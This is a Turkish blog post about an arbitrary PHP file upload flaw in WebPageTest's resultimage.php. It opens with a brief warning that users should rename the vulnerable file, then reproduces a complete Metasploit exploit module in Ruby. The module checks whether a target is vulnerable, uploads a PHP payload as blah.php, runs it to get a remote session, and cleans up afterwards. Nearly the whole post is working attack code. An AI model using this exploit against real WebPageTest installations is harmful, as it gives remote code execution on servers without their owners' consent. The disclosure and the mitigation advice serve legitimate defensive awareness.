WebPageTest Arbitrary PHP File Upload

WebPageTest resultimage.php de bulunan açık sayedinde php dosyası uploadına izin veriyor. Bu tür basit açıkların nelere mal olduğunu daha önceki konularda bahsettim. Metospolit tarafından yayınlanan ve exploit edilen açık fixlenene kadar bu scripti kullananlar upload izin veren php dosyasının adını değiştirmelidirler.

_________________________________________________________________________

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

#   http://metasploit.com/framework/

##

 

require ‘msf/core’

 

class Metasploit3 < Msf::Exploit::Remote

            Rank = ExcellentRanking

 

            include Msf::Exploit::Remote::HttpClient

 

            def initialize(info={})

                        super(update_info(info,

                                   ‘Name’           => “WebPageTest Arbitrary PHP File Upload”,

                                   ‘Description’    => %q{

                                                           This module exploits a vulnerability found in WebPageTest’s Upload Feature. By

                                               default, the resultimage.php file does not verify the user-supplied item before

                                               saving it to disk, and then places this item in the web directory accessable by

                                               remote users.  This flaw can be abused to gain remote code execution.

                                   },

                                   ‘License’        => MSF_LICENSE,

                                   ‘Author’         =>

                                               [

                                                           ‘dun’,    #Discovery, PoC

                                                           ‘sinn3r’  #Metasploit

                                               ],

                                   ‘References’     =>

                                               [

                                                           [‘OSVDB’, ‘83822’],

                                                           [‘EDB’, ‘19790’]

                                               ],

                                   ‘Payload’        =>

                                               {

                                                           ‘BadChars’ => “\x00”

                                               },

                                   ‘DefaultOptions’  =>

                                               {

                                                           ‘ExitFunction’ => “none”

                                               },

                                   ‘Platform’       => [‘php’],

                                   ‘Arch’           => ARCH_PHP,

                                   ‘Targets’        =>

                                               [

                                                           [‘WebPageTest v2.6 or older’, {}]

                                               ],

                                   ‘Privileged’     => false,

                                   ‘DisclosureDate’ => “Jul 13 2012”,

                                   ‘DefaultTarget’  => 0))

 

                                   register_options(

                                               [

                                                           OptString.new(‘TARGETURI’, [true, ‘The base path to WebPageTest’, ‘/www/’])

                                               ], self.class)

            end

 

 

            def check

                        peer = “#{rhost}:#{rport}”

                        target_uri.path << ‘/’ if target_uri.path[-1,1] != ‘/’

                        base = File.dirname(“#{target_uri.path}.”)

 

                        res1 = send_request_raw({‘uri’=>”#{base}/index.php”})

                        res2 = send_request_raw({‘uri’=>”#{base}/work/resultimage.php”})

 

                        if res1 and res1.body =~ /WebPagetest \- Website Performance and Optimization Test/ and

                           res2 and res2.code == 200

                                   return Exploit::CheckCode::Vulnerable

                        end

 

                        return Exploit::CheckCode::Safe

            end

 

 

            def on_new_session(cli)

                        if cli.type != “meterpreter”

                                   print_error(“No automatic cleanup for you. Please manually remove: #{@target_path}”)

                                   return

                        end

                        cli.core.use(“stdapi”) if not cli.ext.aliases.include?(“stdapi”)

                        cli.fs.file.rm(@target_path)

                        print_status(“#{@target_path} removed”)

            end

 

 

            def exploit

                        peer = “#{rhost}:#{rport}”

                        target_uri.path << ‘/’ if target_uri.path[-1,1] != ‘/’

                        base = File.dirname(“#{target_uri.path}.”)

 

                        p = payload.encoded

                        fname = “blah.php”

                        data = Rex::MIME::Message.new

                        data.add_part(

                                   “<?php #{p} ?>”,                                   #Data is our payload

                                   ‘multipart/form-data’,                             #Content Type

                                   nil,                                               #Transfer Encoding

                                   “form-data; name=\”file\”; filename=\”#{fname}\””  #Content Disposition

                        )

 

                        print_status(“#{peer} – Uploading payload (#{p.length.to_s} bytes)…”)

                        res = send_request_cgi({

                                   ‘method’ => ‘POST’,

                                   ‘uri’    => “#{base}/work/resultimage.php”,

                                   ‘ctype’  => “multipart/form-data; boundary=#{data.bound}”,

                                   ‘data’   => data.to_s

                        })

 

                        if not res

                                   print_error(“#{peer} – No response from host”)

                                   return

                        end

 

                        @target_path = “#{base}/results/#{fname}”

                        print_status(“#{peer} – Requesting #{@target_path}”)

                        res = send_request_cgi({‘uri’=>@target_path})

 

                        handler

 

                        if res and res.code == 404

                                   print_error(“#{peer} – Payload failed to upload”)

                        end

            end

end

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir